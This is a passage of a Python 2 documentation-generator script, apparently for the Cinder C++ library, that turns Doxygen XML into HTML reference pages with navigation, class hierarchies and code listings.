subnav_list.append(subnav_obj)
self.pagenav = subnav_list
# add keywords
keywords = []
metadata = config_data["metadata"]
if metadata:
if metadata["keywords"]:
for k in metadata["keywords"]:
keywords.append(k)
self.keywords = keywords
# add seealso ci links
see_also = config_data["seealso"]
self.see_also_label = ""
self.see_also_tags = []
if see_also:
self.see_also_label = config_data["seealso"]["label"]
for ci in config_data["seealso"]["dox"]:
self.see_also_tags.append(ci)
# recursively parse subnav
def parse_subnav(self, path, subnav):
nav = []
for menu in subnav:
subnav_obj = {}
link_data = LinkData(os.path.join(path, menu["link"]), menu["label"])
local_subnav = None
if menu.get("subnav"):
local_subnav = self.parse_subnav(path, menu["subnav"])
subnav_obj["link_data"] = link_data
subnav_obj["length"] = 0
if local_subnav:
subnav_obj["length"] = len(local_subnav)
subnav_obj["subnav"] = local_subnav
nav.append(subnav_obj)
return nav
class LinkData(object):
def __init__(self, link=None, label=None, active=True):
self.link = link
self.label = label
self.active = active
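# LinkData is a plain value object consumed by the mustache templates, e.g.:
#   link = LinkData("classes/cinder_1_1gl_1_1Texture.html", "Texture")
#   crumb = LinkData("", "glm::detail", active=False)  # inactive breadcrumb link
# (the paths above are illustrative, not actual generated files)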
# ==================================================================================================== Utility functions
def find_compound_name(tree):
for compound_def in tree.iter("compounddef"):
for compound_name in compound_def.iter("compoundname"):
return compound_name.text
def find_file_kind(tree):
kind = tree.find(r"compounddef").attrib['kind']
return kind
def find_member_anchor(member):
"""
Parses out the anchor tag from a member
"""
anchor_str = member.attrib["id"].split("_1")[-1]
return anchor_str
def find_file_kind_explicit(tree):
"""
Find a more specific file kind based on the name of the file.
So instead of just class as the tag file specifies its kind as,
it might also be a struct or interface.
:param tree:
:return: string of kind
"""
obj_id = tree.find(r"compounddef").attrib['id']
if obj_id.startswith("struct"):
if obj_id.endswith("_t"):
return "struct_template"
else:
return "struct"
elif obj_id.startswith("interface"):
return "interface"
elif obj_id.startswith("namespace"):
return "namespace"
else:
if obj_id.endswith("_t"):
return "class_template"
else:
return "class"
def find_compound_name_stripped(tree):
compound_name = find_compound_name(tree)
name = strip_compound_name(compound_name)
return name
def strip_compound_name(full_string):
ns_parts = full_string.split("::")
name = "".join(ns_parts[-1])
return name
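# e.g. strip_compound_name("cinder::gl::Texture") -> "Texture"
#      strip_compound_name("Texture")             -> "Texture"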
def parse_arg_list(arg_string):
# replace any commas in < and > enclosures with a temporary delim *** so that they
# don't get in the way when splitting args
arg_list = re.sub(r'(<\s\S*)(,)(\s\S* *>)', r'\1***\3', arg_string)
# split the args into a list
args = arg_list[1:-1].split(', ')
# strip white space
args = map(str.strip, args)
stripped_args = []
for indx, arg in enumerate(args):
is_optional = arg.find("=") > -1
# if there is more than one word, take the last one off
# if len(arg.split(" ")) > 1:
# arg = " ".join(arg.split(" ")[:-1])
# we only want the new list to include required args
if not is_optional:
# replace the temp delimiter with a comma again
arg = arg.replace("***", ",")
stripped_args.append(arg)
# filter empty strings
stripped_args = filter(None, stripped_args)
return stripped_args
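# Illustrative example: optional args are dropped and commas inside template
# brackets (matched by the regex above) survive the split:
#   parse_arg_list("(int size, const std::map< int, float > &lut, bool flip=false)")
#   # -> ["int size", "const std::map< int, float > &lut"]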
def get_namespace(full_string):
ns_parts = full_string.split("::")
prefix = "::".join(ns_parts[:-1]) # parent namespace up to last ::
return prefix
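# e.g. get_namespace("cinder::gl::Texture") -> "cinder::gl"
#      get_namespace("Texture")             -> ""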
def add_class_to_tag(tag, class_name):
tag["class"] = tag.get("class", []) + [class_name]
def gen_anchor_tag(bs4, anchor_name):
anchor = gen_tag(bs4, "a")
anchor["name"] = anchor_name
return anchor
def gen_tag(bs4, tag_type, classes=None, contents=None):
""" Generates a new html element and optionally adds classes and content
Args:
bs4: beautiful soup
tag_type: html tag/element (p, a, em, etc)
classes: array of strings that you want as classes for the element
contents: any content that you want to populate your tag with, if known
"""
new_tag = bs4.new_tag(tag_type)
if classes:
for c in classes:
add_class_to_tag(new_tag, c)
if contents:
if type(contents) is list:
for c in contents:
new_tag.append(clone(c))
else:
new_tag.append(contents)
return new_tag
def gen_link_tag(bs4, text, link, target="_self"):
link_tag = gen_tag(bs4, "a", [], text)
define_link_tag(link_tag, {"href": link})
link_tag["target"] = target
return link_tag
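# Example: build an external link that opens in a new tab,
#   gen_link_tag(bs4, "Cinder", "https://libcinder.org", "_blank")
#   # -> <a href="https://libcinder.org" target="_blank">Cinder</a>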
def gen_rel_link_tag(bs4, text, link, src_dir, dest_dir):
"""
Generates a link tag that was relative to the source directory, but should now be relative to the destination directory
:param bs4: beautifulsoup instance
:param text: text of link
:param link: relative link
:param src_dir: original source directory
:param dest_dir: destination directory
:return: the link tag
"""
# make sure they are dirs
src_dir = os.path.dirname(src_dir) + os.sep
dest_dir = os.path.dirname(dest_dir) + os.sep
new_link = relative_url(dest_dir, link)
link_tag = gen_link_tag(bs4, text, new_link)
return link_tag
def replace_element(bs4, element, replacement_tag):
"""
Replaces an html element with another one, keeping the text contents.
Use Case: Useful for replacing links with em tags or divs with spans
:param bs4: Beautiful Soup instance doing the work
:param element: element to change
:param replacement_tag: new element type to change to
:return:
"""
if not element:
return
text_content = element.text
replacement = gen_tag(bs4, replacement_tag, None, text_content)
element.replace_with(replacement)
def get_body_content(bs4):
return_str = ""
for content in bs4.body.contents:
content_utf = unicode(content).encode("utf-8", errors="replace")
content_str = content_utf.decode("utf-8", errors="replace")
if type(content) is Comment:
return_str += "<!-- " + content_str + "-->"
else:
return_str += content_str
return return_str
def extract_anchor(element):
if element.attrib["id"]:
return element.attrib["id"].split("_1")[-1]
else:
return None
def define_link_tag(tag, attrib):
ref_id = None
href = None
if "refid" in attrib:
ref_id = attrib["refid"]
href = ref_id + ".html"
if "kindref" in attrib:
kind = attrib["kindref"]
if kind == "member":
str_list = ref_id.rsplit("_1", 1)
href = str_list[0] + ".html#" + str_list[1]
if "linkid" in attrib:
href = "../../include/cinder/" + attrib["linkid"]
if "href" in attrib:
href = attrib["href"]
if "typedef" in attrib:
data = attrib["typedef"]
file_name = data.find("anchorfile").text
anchor = data.find("anchor").text
href = file_name + "#" + anchor
if href is None:
log("DEFINING LINK TAG: " + str(tag), 1)
else:
tag["href"] = href
def parse_member_definition(bs4, member, member_name=None):
"""
Parses a function tree and generates an object out of it
:param bs4: beautifulsoup instance
:param member: the member to parse
:param member_name: the name of the class that's being parsed
:return: the data object
"""
if not member_name:
member_name = member.find(r"name")
member_name = member_name.text if member_name is not None else None
anchor = find_member_anchor(member)
# return type
return_div = gen_tag(bs4, "span")
return_markup = iterate_markup(bs4, member.find(r"type"), return_div)
# if id has a glm group key, replace link with <em>. The links are irrelevant at the moment
if any(member.attrib["id"].find(group_key) > -1 for group_key in config.GLM_MODULE_CONFIG["group_keys"]):
if return_markup:
replace_element(bs4, return_markup.a, "em")
return_str = str(return_markup)
# get args
argstring = member.find("argsstring")
if argstring is None:
argstring = member.find("arglist")
argstring_text = argstring.text if argstring is not None else ""
# description
description_div = markup_description(bs4, member)
description_str = str(description_div) if len(description_div.text) > 0 else None
member_obj = {
"name": member_name,
"return": return_str,
"anchor": anchor,
"definition": {
"name": member_name,
"args": argstring_text
},
"description": description_str
}
return member_obj
def parse_function(bs4, member, class_name=None):
member_name = member.find(r"name")
member_name = member_name.text if member_name is not None else None
is_constructor = False
# determine if it is a constructor
if class_name is not None:
if member_name is not None and member_name == strip_compound_name(class_name):
is_constructor = True
member_obj = parse_member_definition(bs4, member, member_name)
member_obj["is_constructor"] = is_constructor
return member_obj
def parse_enum(bs4, member):
member_obj = parse_member_definition(bs4, member)
values = []
for val in member.findall("enumvalue"):
enum_name = val.find("name").text
values.append({"name": enum_name})
member_obj["values"] = values
member_obj["return"] = "enum"
return member_obj
def define_tag(bs4, tag_name, tree):
""" Creates a new html element with the specified tag_name. "a" tags and "ulink"
tags are different since it generates a tags with links defined in the tree.
Args:
bs4: BeautifulSoup instance
tag_name: What the new tag should be
tree: original element tree which contains extra optional information
"""
if tag_name == "a":
new_tag = bs4.new_tag(tag_name)
define_link_tag(new_tag, tree.attrib)
# creates a new tag with a relative link using the data from the original tag
# TODO: refactor define_tag and gen_rel_link_tag. Should be able to create a relative link on its own
# new_tag = gen_rel_link_tag(bs4, "", new_tag["href"], TEMPLATE_PATH, DOXYGEN_HTML_PATH)
new_tag = gen_link_tag(bs4, "", "../" + new_tag["href"])
elif tag_name == "ulink":
# ulinks are for external links
new_tag = bs4.new_tag("a")
new_tag = gen_link_tag(bs4, "", tree.attrib['url'], "_blank")
else:
new_tag = bs4.new_tag(tag_name)
return new_tag
def iter_class_base(class_def, hierarchy):
""" Iterates the class to find all of their base classes
and iterate through them
Args:
class_def: The instance of SymbolMap::Class Object whose base we are searching for
hierarchy: The current hierarchy of classes to append to if we find another base
"""
if class_def is None or hasattr(class_def, 'name') is False:
return False
base = class_def.base
if base is None:
return False
else:
new_tree = g_symbolMap.find_class(base)
# add to hierarchy if it continues
if iter_class_base(new_tree, hierarchy) is not False:
hierarchy.append(new_tree)
def gen_class_hierarchy(bs4, class_def):
""" Generates the class hierarchy side bar, with each class linking
out to its class file.
Args:
bs4: The current beautifulSoup html instance
classDef: The instance of SymbolMap::Class Object that we are generating
the hierachy for
Returns:
Empty if there is no base class
Ul if there is hierarchy
"""
if class_def is None:
return
# first item in the list will be the original class
hierarchy = []
# get the class' hierarchy
iter_class_base(class_def, hierarchy)
hierarchy.append(class_def)
if len(hierarchy) == 1:
return
# create all of the markup
ul = gen_tag(bs4, "ul")
add_class_to_tag(ul, "inheritence")
# go through the hierarchy and add a list item for each member
# for index, base in enumerate(reversed(hierarchy)):
for index, base in enumerate(hierarchy):
li = gen_tag(bs4, "li")
add_class_to_tag(li, "depth" + str(index + 1))
# link out only if a base class, not the original class
if index < len(hierarchy) - 1:
a = gen_tag(bs4, "a", [], base.qualifiedName)
define_link_tag(a, {'href': base.path})
a = gen_link_tag(bs4, base.qualifiedName, path_join(HTML_DEST_PATH, a["href"]))
li.append(a)
else:
li.append(base.qualifiedName)
ul.append(li)
return ul
def replace_tag(bs4, tree, parent_tag, content):
tag = tree.tag
attrib = tree.attrib
has_parent = False
tag_name = None
if parent_tag and parent_tag.parent:
has_parent = True
# change parentTag if necessary
if tag == "codeline":
parent_tag = parent_tag.code
# find html tag based on tag
if tag == "para":
if has_parent and parent_tag.parent.dl:
tag_name = "dd"
else:
tag_name = tagDictionary[tag]
elif tag == "sp":
if content is None:
content = " "
else:
content.append(" ")
# get tag equivalent
if tag in tagDictionary:
tag_name = tagDictionary[tag]
new_tag = define_tag(bs4, tag_name, tree)
else:
# TODO: replace with nothing - no new tag
tag_name = "span"
new_tag = define_tag(bs4, tag_name, tree)
add_class_to_tag(new_tag, tag)
content_tag = new_tag
# if simplesect, construct with some content
if tag == "simplesect":
see_tag = bs4.new_tag("dt")
add_class_to_tag(see_tag, "section")
# "see also" reference
if attrib["kind"] == "see":
add_class_to_tag(see_tag, "see")
see_tag.string = "See Also"
new_tag.append(see_tag)
if tag == "programlisting":
code_tag = bs4.new_tag("code")
add_class_to_tag(code_tag, "language-cpp")
new_tag.append(code_tag)
content_tag = code_tag
if tag == "computeroutput":
if content:
content = content.strip()
if content is not None:
content_tag.append(content)
parent_tag.append(new_tag)
return new_tag
def iterate_markup(bs4, tree, parent):
if tree is None:
return
current_tag = parent
content = None
# add content to tag as is ( no stripping of whitespace )
if tree.text is not None:
content = tree.text
# append any new tags
if tree.tag is not None:
html_tag = replace_tag(bs4, tree, current_tag, content)
# if tree parent == <p> && newTag == <pre>
# add a new pre tag in and make that the current parent again
current_tag = html_tag
# iterate through children tags
for child in list(tree):
iterate_markup(bs4, child, current_tag)
# tail is any extra text that isn't wrapped in another tag
# that exists before the next tag
if tree.tail is not None:
parent.append(tree.tail)
if tree.tail.endswith(";"):
parent.append(gen_tag(bs4, "br"))
return current_tag
def markup_brief_description(bs4, tree, description_el=None):
if description_el is None:
description_el = gen_tag(bs4, "div", ["description", "content"])
brief_desc = tree.findall(r'briefdescription/')
if brief_desc is None:
return
else:
for desc in brief_desc:
iterate_markup(bs4, desc, description_el)
return description_el
def markup_description(bs4, tree):
description_el = gen_tag(bs4, "div", ["description", "content"])
# mark up brief description first
markup_brief_description(bs4, tree, description_el)
# mark up detailed description next
detailed_desc = tree.findall(r'detaileddescription/')
if detailed_desc is not None:
for desc in detailed_desc:
iterate_markup(bs4, desc, description_el)
return description_el
def replace_code_chunks(bs4):
"""
Looks though the html and replaces any code chunks that exist
in a paragraph and splits them up so that we can use pre tags.
:param bs4:
:return:
"""
# find all the code chunks
code_chunks = bs4.find_all("div", "programlisting")
code_chunks += bs4.find_all("span", "programlisting")
for chunk in code_chunks:
pre_tag = bs4.new_tag("pre")
code_tag = bs4.new_tag("code")
add_class_to_tag(code_tag, "language-cpp")
# for each code line, add a line of that text to the new div
codeline = chunk.find_all("div", "codeline")
codeline += chunk.find_all("span", "codeline")
if codeline:
for line in codeline:
line_text = ""
for c in line.contents:
if type(c) is Tag:
line_text += c.text
else:
line_text += c
code_tag.append(line_text + "\n")
pre_tag.append(code_tag)
# replace content in code chunks
chunk.clear()
replacement_span = gen_tag(bs4, "span")
replacement_span.append(pre_tag)
chunk.append(pre_tag)
# clone an element
# from: http://stackoverflow.com/questions/23057631/clone-element-with-beautifulsoup/23058678#23058678
def clone(el):
if isinstance(el, NavigableString):
return type(el)(el)
tag_copy = Tag(None, el.builder, el.name, el.namespace, el.nsprefix)
# work around bug where there is no builder set
# https://bugs.launchpad.net/beautifulsoup/+bug/1307471
tag_copy.attrs = dict(el.attrs)
tag_copy.index = el.index
for attr in ('can_be_empty_element', 'hidden'):
setattr(tag_copy, attr, getattr(el, attr))
for child in el.contents:
tag_copy.append(clone(child))
return tag_copy
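# Usage note: BeautifulSoup reparents a node on append, so clone() is used
# wherever the same fragment must appear in more than one place, e.g.
# new_tag.append(clone(c)) in gen_tag above and get_template below.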
# pull a templated chunk of html out of the selected bs4 file
def get_template(bs4, element_id):
templates = bs4.find_all('template')
template = None
for t in templates:
# [0] is a string before the enclosed div, so use [1] instead
if t['id'] == element_id:
template = clone(list(t.contents)[1])
else:
continue
return template
def inject_html(src_content, dest_el, src_path, dest_path):
"""
Append a chunk of html into a specific div
:param src_content: The src html to be injected
:param dest_el: The div to inject the src html into
:param src_path: The path of the src file so that we can fix the relative links
:return:
"""
if not dest_el:
log("destination element does not exist", 1)
update_links(src_content, src_path, src_path, dest_path)
try:
# copy source content into to bs4 instance so that we can copy over without messing up the source
bs4 = BeautifulSoup(str(src_content).decode("UTF-8"))
# copy all Tags over to dest element
for content in bs4.body.contents:
if type(content) is Tag:
dest_el.append(content)
except AttributeError as e:
log("appending html content to element [ " + e.message + " ]", 2)
def iterate_namespace(bs4, namespaces, tree, index, label):
# Get namespace of previous child, unless first
if index == 0:
parent_ns = ""
else:
parent_ns = namespaces[index - 1].name
count = index
child_count = 0
# iterate to find all children of parentNs
for ns in namespaces[index:]:
namespace = ns.name # full namespace
ns_parts = namespace.split("::")
prefix = "::".join(ns_parts[:-1]) # parent namespace up to last ::
name = "".join(ns_parts[-1])
node_label = label + str(child_count)
# check if derived from any parent
parent_is_derived = has_ancestor(namespaces, namespace)
# create a list item for the namespace
ns_li = gen_tag(bs4, "li")
ns_li["data-namespace"] = namespace
# create link for each item
a_tag = gen_link_tag(bs4, name, path_join(HTML_SOURCE_PATH, ns.path))
# is descendant of parent namespace
if prefix == parent_ns:
child_count += 1
# append to parent
tree.append(ns_li)
# generate new nested ul in case there are children
ns_ul = gen_tag(bs4, "ul")
if count < len(namespaces):
# if there are children, add to the parent ul
if iterate_namespace(bs4, namespaces, ns_ul, count + 1, node_label) > 0:
# add input
input_el = gen_tag(bs4, "input")
input_el["type"] = "checkbox"
input_el["id"] = "item-" + "-".join(list(node_label))
# root is expanded by default
if index == 0:
input_el.attrs["checked"] = "true"
label_tag = gen_tag(bs4, "label")
label_tag["for"] = "item-" + "-".join(list(node_label))
label_tag.append(a_tag)
ns_li.insert(0, input_el)
ns_li.append(label_tag)
ns_li.append(ns_ul)
else:
ns_li.append(a_tag)
else:
# has no direct descendant on the parent, so add it independently
if parent_is_derived is False and index == 0:
child_count += 1
indie_li = gen_tag(bs4, "li")
# indieLi.append( prefix )
# TODO: refactor and simplify some of this stuff
input_el = gen_tag(bs4, "input")
input_el["type"] = "checkbox"
input_el["id"] = "item-" + "-".join(list(node_label))
indie_li.insert(0, input_el)
label_tag = gen_tag(bs4, "label")
label_tag["for"] = "item-" + "-".join(list(node_label))
label_tag.append(prefix)
indie_li.append(label_tag)
indie_ul = gen_tag(bs4, "ul")
indie_li.append(indie_ul)
indie_ul.append(ns_li)
ns_li.append(a_tag)
tree.append(indie_li)
count += 1
return child_count
def has_ancestor(namespaces, compare_namespace):
compare_prefix = compare_namespace.split("::")[0]
for ns in namespaces:
namespace = ns.name
prefix = namespace.split("::")[0]
if prefix == compare_prefix and compare_namespace != namespace:
return True
return False
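# Example: with namespace objects for "cinder" and "cinder::gl" loaded,
#   has_ancestor(namespaces, "cinder::gl")  # -> True ("cinder" shares the root part)
#   has_ancestor(namespaces, "glm")         # -> False (assuming no other glm entries)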
def generate_namespace_nav():
"""
Creates a div filled with a list of namespace links
:return: a new ul element that contains the navigation tree
"""
bs4 = BeautifulSoup()
namespaces = g_symbolMap.get_whitelisted_namespaces()
# tree = gen_tag(bs4, "div")
ul = gen_tag(bs4, "ul")
# tree.append(ul)
add_class_to_tag(ul, "css-treeview")
ul["id"] = "namespace-nav"
iterate_namespace(bs4, namespaces, ul, 0, "")
return ul
def find_typedefs_of(class_name, typedef_list):
"""
Finds typedef objects that are shared from the given class within a given namespace
:return: list if SymbolMap.Typedef objects
"""
typedefs = []
class_name = strip_compound_name(class_name)
for typedef in typedef_list:
if typedef.sharedFrom:
if typedef.sharedFrom.name == class_name:
typedefs.append(typedef)
return typedefs
# ============================================================================================ File Processing Functions
def process_xml_file_definition(in_path, out_path, file_type):
"""
Process an xml file definition, such as a class, namespace, or group
:param in_path: xml file location
:param out_path: final html file location
:param file_type: "class", "namespace", or "group"
:return:
"""
# we don't process files that start with '_'
if os.path.basename(in_path).startswith("_"):
return
# define the tree that contains all the data we need to populate this page
tree = parse_xml(in_path)
if tree is None:
return
if file_type == "class":
if any(in_path.find(blacklisted) > -1 for blacklisted in config.CLASS_LIST_BLACKLIST):
log("Skipping file | Class " + in_path + " blacklisted", 0)
return
html_template = config.CLASS_TEMPLATE
file_data = fill_class_content(tree)
section = "classes"
body_class = "classes"
elif file_type == "namespace":
html_template = config.NAMESPACE_TEMPLATE
file_data = fill_namespace_content(tree)
if not file_data:
return
section = "namespaces"
body_class = "namespaces"
elif file_type == "module":
html_template = config.GROUP_TEMPLATE
file_data = fill_group_content(tree, config.GLM_MODULE_CONFIG)
section = "reference"
body_class = "reference"
else:
log("Skipping " + in_path, 1)
return
log_progress('Processing file: ' + str(in_path))
# Generate the html file from the template and inject content
file_content = file_data.get_content()
bs4 = render_template(html_template, file_content)
content_dict = {
"page_title": file_content["title"],
"main_content": get_body_content(bs4),
"body_class": body_class,
"section_namespace": "cinder",
str("section_" + section): "true"}
# append file meta
content_dict.update(file_meta.copy())
# render within main template
bs4 = render_template(os.path.join(TEMPLATE_PATH, "master-template.mustache"), content_dict)
# make sure all links are absolute
update_links_abs(bs4, TEMPLATE_PATH)
if not bs4:
log("Skipping class due to something nasty. Bother Greg and try again some other time. Error rendering: " + in_path, 2)
return
# print output
# update links in the template
update_links(bs4, TEMPLATE_PATH + "htmlContentTemplate.html", TEMPLATE_PATH, out_path)
# replace any code chunks with <pre> tags, which is not possible on initial creation
replace_code_chunks(bs4)
# link up all ci tags
for tag in bs4.find_all('ci'):
process_ci_tag(bs4, tag, in_path, out_path)
# add to search index
link_path = gen_rel_link_tag(bs4, "", out_path, HTML_SOURCE_PATH, HTML_DEST_PATH)["href"]
add_to_search_index(bs4, link_path, file_data.kind, file_data.search_tags)
# deactivate invalid relative links
for link in bs4.find_all("a"):
if link.has_attr("href") and link["href"].startswith("_"):
# replace <a> with <span>
dead_tag = gen_tag(bs4, "span", None, link.string)
link.replace_with(dead_tag)
# write the file
write_html(bs4, out_path)
def parse_namespaces(tree, sections):
namespaces = []
if config.is_section_whitelisted(sections, "namespaces"):
for member in tree.findall(r"compounddef/innernamespace"):
link = path_join(HTML_DEST_PATH, member.attrib["refid"] + ".html")
link_data = LinkData(link, member.text)
namespaces.append(link_data)
return namespaces
def parse_classes(tree, sections):
classes = []
if config.is_section_whitelisted(sections, "classes"):
for member in tree.findall(r"compounddef/innerclass[@prot='public']"):
link = member.attrib["refid"] + ".html"
rel_link = path_join(HTML_DEST_PATH, link)
link_data = LinkData(rel_link, member.text)
kind = "struct" if link.startswith("struct") else "class"
class_obj = {
"link_data": link_data,
"kind": kind
}
classes.append(class_obj)
return classes
def parse_typedefs(bs4, tree, sections):
typedefs = []
if config.is_section_whitelisted(sections, "typedefs"):
section_config = config.get_section_config(sections, "typedefs")
if section_config:
prefix_blacklist = section_config["prefix_blacklist"] if "prefix_blacklist" in section_config else None
else:
prefix_blacklist = None
for member in tree.findall(r"compounddef/sectiondef/[@kind='typedef']/memberdef/[@kind='typedef']"):
member_name = member.find(r"name").text
if prefix_blacklist and any(member_name.startswith(blacklisted) for blacklisted in prefix_blacklist):
# skip this blacklisted typedef
continue
typedef_obj = parse_member_definition(bs4, member)
typedefs.append(typedef_obj)
return typedefs
def parse_enums(bs4, tree, sections):
enums = []
if config.is_section_whitelisted(sections, "enums"):
for member in tree.findall(r"compounddef/sectiondef/[@kind='enum']/memberdef/[@kind='enum']"):
member_obj = parse_enum(bs4, member)
enums.append(member_obj)
return enums
def parse_functions(bs4, tree, sections):
fns = []
if config.is_section_whitelisted(sections, "functions"):
for member in tree.findall(r"compounddef/sectiondef/[@kind='func']/memberdef/[@kind='function']"):
function_obj = parse_member_definition(bs4, member)
fns.append(function_obj)
return fns
def parse_free_functions(bs4, tree, sections):
free_fns = []
if config.is_section_whitelisted(sections, "free_functions"):
for member in tree.findall(r"compounddef/sectiondef/[@kind='user-defined']/memberdef/[@kind='function']"):
function_obj = parse_member_definition(bs4, member)
free_fns.append(function_obj)
return free_fns
def parse_vars(bs4, tree, sections):
variables = []
if config.is_section_whitelisted(sections, "variables"):
for member in tree.findall(r"compounddef/sectiondef/[@kind='var']/memberdef/[@kind='variable']"):
var_obj = parse_member_definition(bs4, member)
initializer = member.find('initializer').text if member.find('initializer') is not None else None
var_obj["definition"]["args"] = initializer
variables.append(var_obj)
return variables
def fill_class_content(tree):
"""
Populates the class content object with data
:param tree:
:return:
"""
bs4 = BeautifulSoup()
file_data = ClassFileData(tree)
include_file = ""
include_path = ""
include_tag = tree.find(r"compounddef/includes")
location_tag = tree.find(r"compounddef/location")
if location_tag is not None:
include_path = "/".join(location_tag.attrib["file"].split("/")[1:])
if include_tag is not None:
include_file = include_tag.text
class_name = file_data.name
file_def = g_symbolMap.find_file(include_file)
class_def = g_symbolMap.find_class(class_name)
# class template stuff ------------------------------ #
file_data.is_template = True if tree.find(r"compounddef/templateparamlist") is not None else False
if file_data.is_template:
try:
def_name = tree.find(r"compounddef/templateparamlist/param/type")
file_data.template_def_name = def_name.text if def_name is not None else ""
except Exception as e:
file_data.template_def_name = ""
log(e.message, 1)
if not class_def:
log("NO CLASS OBJECT DEFINED FOR: " + class_name, 1)
# raise
# return
# page title ---------------------------------------- #
file_data.title = file_data.name
# add namespace nav --------------------------------- #
file_data.namespace_nav = str(g_namespaceNav)
# page header --------------------------------------- #
file_data.page_header = file_data.compoundName
# add description ----------------------------------- #
description = markup_description(bs4, tree.find(r'compounddef'))
file_data.description = str(description) if description is not None else ""
# includes ------------------------------------------ #
include_link = None
if include_file and include_path:
file_obj = g_symbolMap.find_file(include_file)
github_path = config.GITHUB_PATH + '/include/' + include_path
if file_obj:
include_link = LinkData(github_path, include_path)
file_data.includes = include_link
# typedefs ------------------------------------------ #
typedefs = []
ns_obj = g_symbolMap.find_namespace(file_data.namespace)
if ns_obj and ns_obj.typedefs:
class_typedefs = find_typedefs_of(class_name, ns_obj.typedefs)
if file_def is not None:
for t in class_typedefs:
link_data = LinkData()
link_data.label = t.name
link_path = path_join(HTML_DEST_PATH, t.path)
link_data.link = link_path
typedefs.append(link_data)
file_data.typedefs = typedefs
# class hierarchy ----------------------------------- #
if class_def:
class_hierarchy = gen_class_hierarchy(bs4, class_def)
file_data.class_hierarchy = str(class_hierarchy) if class_hierarchy else None
# class list ---------------------------------------- #
classes = []
for classDef in tree.findall(r"compounddef/innerclass[@prot='public']"):
link_data = LinkData()
link_data.label = strip_compound_name(classDef.text)
link_data.link = path_join(HTML_DEST_PATH, classDef.attrib["refid"] + ".html")
classes.append(link_data)
file_data.classes = classes
# related links ------------------------------------ #
# generated by guides and references
related = []
if class_def:
if class_def.relatedLinks:
for link_data in class_def.relatedLinks:
related.append(link_data)
# ci prefix / description ----------------------- #
# if the class has a prefix, add it here
if class_def.prefix_content:
file_data.prefix = class_def.prefix_content
file_data.related = related
# enumerations -------------------------------------- #
enumerations = []
for e in tree.findall(r"compounddef/sectiondef/memberdef[@kind='enum']"):
member_obj = parse_enum(bs4, e)
enumerations.append(member_obj)
file_data.enumerations = enumerations
# TODO: Look into and re-evaluate if this is needed or not since the definitions are all over the map and may be an edge case
# public types -------------------------------------- #
# public_types = []
# # for member in tree.findall(r"compounddef/sectiondef/memberdef[@kind='typedef']"):
# for member in tree.findall(r"compounddef/sectiondef[@kind='public-type']/memberdef[@prot='public']"):
#
# member_obj = None
# print member.attrib["kind"]
# if member.attrib["kind"] == "enum":
# member_obj = parse_member_definition(bs4, member)
# member_obj["return"] = "enum"
# enum_link = gen_link_tag(bs4, member_obj["name"], "#"+find_member_anchor(member))
# member_obj["definition"]["name"] = str(enum_link)
# else:
# member_obj = parse_function(bs4, member, class_name)
# print member.attrib["kind"]
# print member.find("name").text
#
# if member_obj is None:
# continue
#
# public_types.append(member_obj)
#
# file_data.public_types = public_types
# public member Functions --------------------------- #
public_fns = []
public_static_fns = []
for memberFn in tree.findall(r'compounddef/sectiondef/memberdef[@kind="function"][@prot="public"]'):
function_obj = parse_function(bs4, memberFn, class_name)
is_static = memberFn.attrib["static"]
if is_static == 'yes':
public_static_fns.append(function_obj)
else:
public_fns.append(function_obj)
file_data.public_functions = public_fns
file_data.public_static_functions = public_static_fns
# protected member functions ------------------------ #
protected_functions = []
for member in tree.findall(r'compounddef/sectiondef/memberdef[@kind="function"][@prot="protected"]'):
function_obj = parse_function(bs4, member, class_name)
protected_functions.append(function_obj)
file_data.protected_functions = protected_functions
# protected attributes ------------------------------ #
protected_attrs = []
for v in tree.findall(r'compounddef/sectiondef/memberdef[@kind="variable"][@prot="protected"]'):
member_obj = parse_member_definition(bs4, v)
protected_attrs.append(member_obj)
file_data.protected_attrs = protected_attrs
# friends ------------------------------------------- #
friends = []
for member in tree.findall(r'compounddef/sectiondef/memberdef[@kind="friend"]'):
member_obj = parse_member_definition(bs4, member)
# replace name with link to class
friend_class = g_symbolMap.find_class(member_obj["name"])
# link up friend, if class exists
if friend_class:
friend_link = gen_rel_link_tag(bs4, friend_class.name, friend_class.path, TEMPLATE_PATH, HTML_DEST_PATH)
member_obj["definition"]["name"] = str(friend_link)
friends.append(member_obj)
file_data.friends = friends
if class_def:
file_data.search_tags = class_def.tags
return file_data
def fill_namespace_content(tree):
bs4 = BeautifulSoup()
if tree is None:
return
# get common data for the file
file_data = NamespaceFileData(tree)
ns_def = g_symbolMap.find_namespace(file_data.name)
if ns_def:
if config.is_namespace_blacklisted(ns_def.name):
log("Skipping file | Namespace " + ns_def.name + " blacklisted", 1)
return
else:
log("Skipping: tree is not defined", 1)
return
# return result of special glm namespace content filling
# TODO: if we get here the namespace is NOT blacklisted, so check whether each section is whitelisted; an empty whitelist array means everything is assumed whitelisted
ns_config = config.get_ns_config(ns_def.name)
if ns_config and ns_config.has_key("structure_whitelist"):
sections = ns_config["structure_whitelist"]
else:
sections = None
# if ns_def.name == "glm":
# return fill_glm_namespace_content(tree)
# page title ---------------------------------------- #
file_data.title = file_data.name
# add namespace nav --------------------------------- #
file_data.namespace_nav = str(g_namespaceNav)
# add namespaces ------------------------------------ #
file_data.namespaces = parse_namespaces(tree, sections)
# add classes --------------------------------------- #
file_data.classes = parse_classes(tree, sections)
# add typedefs -------------------------------------- #
file_data.typedefs = parse_typedefs(bs4, tree, sections)
# add enumerations ---------------------------------- #
file_data.enumerations = parse_enums(bs4, tree, sections)
# functions ----------------------------------------- #
file_data.functions = parse_functions(bs4, tree, sections)
# free functions ------------------------------------ #
file_data.free_functions = parse_free_functions(bs4, tree, sections)
# variables ----------------------------------------- #
file_data.variables = parse_vars(bs4, tree, sections)
# define search tags
if ns_def:
file_data.search_tags = ns_def.tags
else:
file_data.search_tags = []
file_data.search_tags.extend(["namespace"])
return file_data
def fill_group_content(tree, module_config):
bs4 = BeautifulSoup()
file_data = GroupFileData(tree, module_config)
group_name = file_data.name
group_def = g_symbolMap.find_group(group_name)
if not group_def:
log("NO GROUP OBJECT DEFINED FOR: " + group_name, 1)
return
# page title ---------------------------------------- #
file_data.title = file_data.name
# page header --------------------------------------- #
file_data.page_header = file_data.name
# add description ----------------------------------- #
description = markup_description(bs4, tree.find(r'compounddef'))
file_data.description = str(description) if description is not None else ""
# submodules ---------------------------------------- #
subgroups = []
for subgroup in group_def.subgroups:
subgroup_obj = {
"label": subgroup.name,
"link": subgroup.path
}
subgroups.append(subgroup_obj)
file_data.subgroups = subgroups
# typedefs ------------------------------------------ #
typedefs = []
for member in tree.findall(r"compounddef/sectiondef/[@kind='typedef']/memberdef/[@kind='typedef']"):
